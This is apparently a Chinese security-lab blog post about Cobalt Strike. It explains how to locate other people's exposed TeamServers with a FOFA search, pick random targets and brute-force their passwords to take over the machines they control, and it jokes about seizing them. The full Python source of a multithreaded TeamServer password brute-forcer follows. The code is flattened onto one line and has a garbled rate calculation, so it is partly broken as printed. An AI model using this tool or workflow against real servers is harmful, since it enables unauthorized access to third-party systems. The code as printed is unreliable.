
“燕云实验室”是河北千诚电子科技有限公司成立的网络安全攻防技术研究实验室。专注于web安全,网络攻防,安全运维,应急溯源方面的研究,开发成果应用于产品核心技术转化,国家重点科技项目攻关。
燕云实验室最近在研究 Cobalt Strike 远程控制时无意中发现一款 Cobalt Strike 口令暴力破解工具,测试发现可控多线程稳定暴力破解 Cobalt Strike 的 TeamServer 密码。
Cobalt Strike是一款商业化的渗透测试利器,由著名的攻防专业团队Strategic Cyber开发。该工具被广泛应用于渗透测试项目中,在提高政府和企业网络设施安全性上起到了重要的作用。同时,随着网络空间的红蓝对抗不断发展,该框架成为对手模拟和红队行动中最为流行的一款软件。但由于该框架具备团队协作攻击、流量防检测、防安全软件查杀等优势,因而也被大量黑客组织用于真实的高危害性的攻击。目前已知的多个APT组织都曾经使用过Cobalt Strike攻击框架,如FIN6、Cobalt Group组织和“海莲花”等。但是,目前所披露出来的攻击情报只是黑客利用Cobalt Strike进行非法攻击的冰山一角。由于该框架集成有丰富的逃避流量监测和沙箱检测技术,且具备优秀的反追踪能力,再结合黑客团体积累的免杀技术和C&C隐藏技术,使得业内对Cobalt Strike框架的利用状况知之甚少,也很难有一个全面的了解和清晰的认知。这种情况直接导致大量依赖于Cobalt Strike框架进行的网络攻击行为被忽视或者漏掉,如目前仍然存在许多VT查杀率为0的样本以及因利用C&C隐藏技术而存活至今的控制命令服务器。

Cobalt Strike是由美国Red Team开发,官网地址:
http://cobaltstrike.com

这个工具的社区版是大家熟知的Armitage(一个MSF的图形化界面工具),而Cobalt Strike大家可以理解其为Armitage的商业版。
然而今天我们并不是介绍和讲解Cobalt Strike的用法,而是关于Cobalt Strike的口令暴力破解。
众所周知Cobalt Strike的工作方式是以TeamServer为核心,可多个Cilent的CS(Server Cilent)架构。

而登录Cobalt Strike的凭证至少需要IP、端口和密码。

而端口[Prot]一般默认都是50050,账户则自定义,那么只要找到目前IP后,即可暴力破解Cobalt Strike的登录密码,一旦破解成功即可登录进去,如果里边有机子——,就可以把它变成自己的机子——(滑稽。
我们先来考虑如何找到别人的Cobalt Strike服务端,首先想到了fofa和shodan,去fofa搜索发现fofa可以直接识别出Cobalt Strike。
fofa搜索 protocol=="cobaltstrike"

数量还是相当可观的,然后随机抽奖几个目标即可。
使用python脚本。

这里FastPwds.txt是我自己的字典。

找到密码后既可登录成功,各位一定要下手轻一点~
脚本源码:
#!/usr/bin/env python3# -*- coding:gbk -*-import timeimport socketimport sslimport argparseimport concurrent.futuresimport sys# csbrute.py - Cobalt Strike Team Server Password Brute Forcer# https://stackoverflow.com/questions/6224736/how-to-write-python-code-that-is-able-to-properly-require-a-minimal-python-versiMIN_PYTHON = (3, 3)if sys.version_info < MIN_PYTHON:sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON)parser = argparse.ArgumentParser()parser.add_argument("host",help="Teamserver address")parser.add_argument("wordlist", nargs="?",help="Newline-delimited word list file")parser.add_argument("-p", dest="port", default=50050, type=int,help="Teamserver port")parser.add_argument("-t", dest="threads", default=25, type=int,help="Concurrency level")args = parser.parse_args()# https://stackoverflow.com/questions/27679890/how-to-handle-ssl-connections-in-raw-python-socketclass NotConnectedException(Exception):def __init__(self, message=None, node=None):self.message = messageself.node = nodeclass DisconnectedException(Exception):def __init__(self, message=None, node=None):self.message = messageself.node = nodeclass Connector:def __init__(self):self.sock = Noneself.ssl_sock = Noneself.ctx = ssl.SSLContext()self.ctx.verify_mode = ssl.CERT_NONEpassdef is_connected(self):return self.sock and self.ssl_sockdef open(self, hostname, port):self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)self.sock.settimeout(10)self.ssl_sock = self.ctx.wrap_socket(self.sock)if hostname == socket.gethostname():ipaddress = socket.gethostbyname_ex(hostname)[2][0]self.ssl_sock.connect((ipaddress, port))else:self.ssl_sock.connect((hostname, port))def close(self):if self.sock:self.sock.close()self.sock = Noneself.ssl_sock = Nonedef send(self, buffer):if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")self.ssl_sock.sendall(buffer)def receive(self):if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")received_size = 0data_buffer = b""while received_size < 4:data_in = self.ssl_sock.recv()data_buffer = data_buffer + data_inreceived_size += len(data_in)return data_bufferdef passwordcheck(password):if len(password) > 0:result = Noneconn = Connector()conn.open(args.host, args.port)payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A"))conn.send(payload)if conn.is_connected(): result = conn.receive()if conn.is_connected(): conn.close()if result == bytearray(b"\x00\x00\xca\xfe"):return passwordelse:return Falseelse:print("Ignored blank password")passwords = []if args.wordlist:print("Wordlist: {}".format(args.wordlist))passwords = open(args.wordlist).read().split("\n")else:print("Wordlist: {}".format("stdin"))for line in sys.stdin:passwords.append(line.rstrip())if len(passwords) > 0:print("Word Count: {}".format(len(passwords)))print("Threads: {}".format(args.threads))start = time.time()# https://stackoverflow.com/questions/2846653/how-to-use-threading-in-pythonattempts = 0failures = 0with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:future_to_check = {executor.submit(passwordcheck, password): password for password in passwords}for future in concurrent.futures.as_completed(future_to_check):password = future_to_check[future]try:data = future.result()attempts = attempts + 1if data:print("Found Password: {}".format(password))except Exception as exc:failures = failures + 1print('%r generated an exception: %s' % (password, exc))print("Attempts: {}".format(attempts))print("Failures: {}".format(failures))finish = time.time()print("Seconds: {:.1f}".format(finish - start))print("Attemps per second: {:.1f}".format((failures + attempts) (finish - start)))else:print("Password(s) required")
声明
署名:CC BY-NC-SA 3.0 CN
文中所涉及的技术,思路和工具仅供以安全为目的的学习交流使用,请勿做非法用途否则后果自负。





